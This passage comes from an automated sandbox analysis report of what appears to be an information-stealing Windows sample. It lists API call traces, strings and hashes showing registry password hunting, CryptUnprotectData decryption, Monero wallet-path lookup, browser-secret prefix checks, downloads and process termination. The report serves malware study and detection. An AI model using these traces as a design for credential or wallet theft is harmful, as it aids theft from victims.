                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                    • String ID: :
                                    • API String ID: 398153587-3653984579
                                    • Opcode ID: 140edad4fcff3dc229b5cf637d89f1e8b40a142017539bae288817a2a5c4ae58
                                    • Instruction ID: 8a3e6a94ea37708ebf6f20402e78d64e501b2483cae6c3950e81b0075a3709c4
                                    • Opcode Fuzzy Hash: 140edad4fcff3dc229b5cf637d89f1e8b40a142017539bae288817a2a5c4ae58
                                    • Instruction Fuzzy Hash: D5313D72A14618ABCB10DBE8DC44EBFBB79FB88710B144519E60AD3340DF74E946CBA0
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 008D829C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D82D3
                                    • lstrlen.KERNEL32(00000000), ref: 008D82F0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D8327
                                    • lstrlen.KERNEL32(00000000), ref: 008D8344
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D837B
                                    • lstrlen.KERNEL32(00000000), ref: 008D8398
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D83C7
                                    • lstrlen.KERNEL32(00000000), ref: 008D83E1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D8410
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: ca5b1aa80881e4a4754df42f50f9d87a08d492e2ff7942e73d881b3365935b0e
                                    • Instruction ID: 1ef5704e918d893b4d584a394e52df2a7d215853b9a7138db2d40fc91124ed8e
                                    • Opcode Fuzzy Hash: ca5b1aa80881e4a4754df42f50f9d87a08d492e2ff7942e73d881b3365935b0e
                                    • Instruction Fuzzy Hash: CF511671A01612DBDB14DFA8D858B6ABBB9FF44350F114629AC06DB344EF30E961CBE0
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008C7745
                                    • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 008C778A
                                    • StrStrA.SHLWAPI(?,Password), ref: 008C77F8
                                      • Part of subcall function 008C7690: GetProcessHeap.KERNEL32(00000008,00000400), ref: 008C769E
                                      • Part of subcall function 008C7690: RtlAllocateHeap.NTDLL(00000000), ref: 008C76A5
                                      • Part of subcall function 008C7690: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008C76CD
                                      • Part of subcall function 008C7690: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 008C76ED
                                      • Part of subcall function 008C7690: LocalFree.KERNEL32(?), ref: 008C76F7
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008C782C
                                    • HeapFree.KERNEL32(00000000), ref: 008C7833
                                    • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 008C7975
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                    • String ID: Password
                                    • API String ID: 356768136-3434357891
                                    • Opcode ID: 69450e2097d968f9b8a3856e37c0963296c305523c28551f00425b17bdb6a60a
                                    • Instruction ID: a8d4359bada8a2a827678b1ba8def4bea3ec35319fe135610a50216b53534670
                                    • Opcode Fuzzy Hash: 69450e2097d968f9b8a3856e37c0963296c305523c28551f00425b17bdb6a60a
                                    • Instruction Fuzzy Hash: B0710DB1D0021DAFDB10DF95C884EEEB7B9FF45300F10456AE605E7200EA759A89CFA5
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,?,?,008D5328), ref: 008E4565
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E456C
                                    • wsprintfW.USER32 ref: 008E457B
                                    • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 008E45EA
                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 008E45F9
                                    • CloseHandle.KERNEL32(00000000,?,?), ref: 008E4600
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                                    • String ID: %hs
                                    • API String ID: 885711575-2783943728
                                    • Opcode ID: 77b78922c4e7ce4112be403aa56d190c3fdde3acb1e776ce048fda0f59b4aa4f
                                    • Instruction ID: 049d6cafb108674f15257a97bd6e9ca1ade71fe1a1d38e48828c4681861a2daa
                                    • Opcode Fuzzy Hash: 77b78922c4e7ce4112be403aa56d190c3fdde3acb1e776ce048fda0f59b4aa4f
                                    • Instruction Fuzzy Hash: 9D313E71A00209ABEB20DBE5DC49FEE7778FF45700F104155FA0AE6190EB74AA46CBA5
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008C1015
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008C101C
                                    • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 008C1039
                                    • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 008C1053
                                    • RegCloseKey.ADVAPI32(?), ref: 008C105D
                                    Strings
                                    • SOFTWARE\monero-project\monero-core, xrefs: 008C102F
                                    • wallet_path, xrefs: 008C104D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                    • API String ID: 3225020163-4244082812
                                    • Opcode ID: a70b0d546eafbcf57b0b4d9454e30b1fbaff71445f124f4cbaa9a65f8f1dbf66
                                    • Instruction ID: 2dd6d021ebd343de0b675ffa4ad8ee0361c7ed9c9e0f630519f9cfe726ad089c
                                    • Opcode Fuzzy Hash: a70b0d546eafbcf57b0b4d9454e30b1fbaff71445f124f4cbaa9a65f8f1dbf66
                                    • Instruction Fuzzy Hash: FFF01D75640209BFEB10EBE09C4DFBB7B7CEB04755F100154BE05E2281DAB55A45C7A0
                                    APIs
                                    • memcmp.MSVCRT(?,v20,00000003), ref: 008C9E64
                                    • memcmp.MSVCRT(?,v10,00000003), ref: 008C9EA2
                                    • LocalAlloc.KERNEL32(00000040), ref: 008C9F07
                                      • Part of subcall function 008E7210: lstrcpy.KERNEL32(00000000,ERROR), ref: 008E722E
                                    • lstrcpy.KERNEL32(00000000,008F5210), ref: 008CA012
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpymemcmp$AllocLocal
                                    • String ID: @$v10$v20
                                    • API String ID: 102826412-278772428
                                    • Opcode ID: 9fd6c0fd720744fc0d59e7c9452c5dbaa24c8084cbd650c5f3dc3e2aa009c27f
                                    • Instruction ID: b27ee3e7d5e977c13b0789e0e0faff7220e6c3605356b8243f2ae7dbce6c6d54
                                    • Opcode Fuzzy Hash: 9fd6c0fd720744fc0d59e7c9452c5dbaa24c8084cbd650c5f3dc3e2aa009c27f
                                    • Instruction Fuzzy Hash: 3C519A71A106099BDB10EFA8CC85F9E7BB4FF01314F054168FA59EB291DB70ED098B91
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008C5589
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008C5590
                                    • InternetOpenA.WININET(008ED014,00000000,00000000,00000000,00000000), ref: 008C55A6
                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000100,00000000), ref: 008C55C1
                                    • InternetReadFile.WININET(?,?,00000400,00000001), ref: 008C55EC
                                    • memcpy.MSVCRT(00000000,?,00000001), ref: 008C5611
                                    • InternetCloseHandle.WININET(?), ref: 008C562B
                                    • InternetCloseHandle.WININET(00000000), ref: 008C5632
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                    • String ID:
                                    • API String ID: 1008454911-0
                                    • Opcode ID: df50c4018200867ca5916d15d77ce0309a56bd4d580cacc895c3fc4ba6da544b
                                    • Instruction ID: 20250ba03c9a98705eb692015320472d0388cc48a5267afbeef899c53ad7b08e
                                    • Opcode Fuzzy Hash: df50c4018200867ca5916d15d77ce0309a56bd4d580cacc895c3fc4ba6da544b
                                    • Instruction Fuzzy Hash: DE414B70A00604AFDB14CF95DC48FAAB7B4FF88714F5481A9E508DB290D771E982CF94
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008E4779
                                    • Process32First.KERNEL32(00000000,00000128), ref: 008E4789
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 008E479B
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008E47BC
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 008E47CB
                                    • CloseHandle.KERNEL32(00000000), ref: 008E47D2
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 008E47E0
                                    • CloseHandle.KERNEL32(00000000), ref: 008E47EB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 3836391474-0
                                    • Opcode ID: 10d0f9bdc854b448b1c8164e01e11d1b5486c9085b5f46b25c971c65b3cc4ab0
                                    • Instruction ID: 434a1bf4dfaf6e43fd567d8d8004a36f8d70d419070e27e0ad09d4b8ff815705
                                    • Opcode Fuzzy Hash: 10d0f9bdc854b448b1c8164e01e11d1b5486c9085b5f46b25c971c65b3cc4ab0
                                    • Instruction Fuzzy Hash: 2A019E71601218AFE7209BE19C89FFA777CEB0A751F001195F909D1180EF759D91CBA0
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008CE8C3
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008CE8F5
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008CE944
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008CE96A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008CE9A2
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 008CE9D8
                                    • FindClose.KERNEL32(00000000), ref: 008CE9E7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$CloseFileNext
                                    • String ID:
                                    • API String ID: 1875835556-0
                                    • Opcode ID: e70356086ea1d5708754e4497ae97bcc299e00e85cb235bb7cb4e19d1a681c5d
                                    • Instruction ID: e4cb42b11c230c41ca223869ef92c7681ae1b1c1e7200b8aa4c3cea0a7c190be
                                    • Opcode Fuzzy Hash: e70356086ea1d5708754e4497ae97bcc299e00e85cb235bb7cb4e19d1a681c5d
                                    • Instruction Fuzzy Hash: 7D02B470A112158FDB68CF59C588B65B7F5FF44728B29C1ADD849DB2A2D732EC82CB40
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008CE8C3
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008CE8F5
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008CE944
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008CE96A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008CE9A2
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 008CE9D8
                                    • FindClose.KERNEL32(00000000), ref: 008CE9E7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$CloseFileNext
                                    • String ID:
                                    • API String ID: 1875835556-0
                                    • Opcode ID: e70356086ea1d5708754e4497ae97bcc299e00e85cb235bb7cb4e19d1a681c5d
                                    • Instruction ID: e4cb42b11c230c41ca223869ef92c7681ae1b1c1e7200b8aa4c3cea0a7c190be
                                    • Opcode Fuzzy Hash: e70356086ea1d5708754e4497ae97bcc299e00e85cb235bb7cb4e19d1a681c5d
                                    • Instruction Fuzzy Hash: 7D02B470A112158FDB68CF59C588B65B7F5FF44728B29C1ADD849DB2A2D732EC82CB40
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 008D84C5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D84FC
                                    • lstrlen.KERNEL32(00000000), ref: 008D8542
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D8575
                                    • lstrlen.KERNEL32(00000000), ref: 008D858B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D85BA
                                    • StrCmpCA.SHLWAPI(00000000,008F5204), ref: 008D85CA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
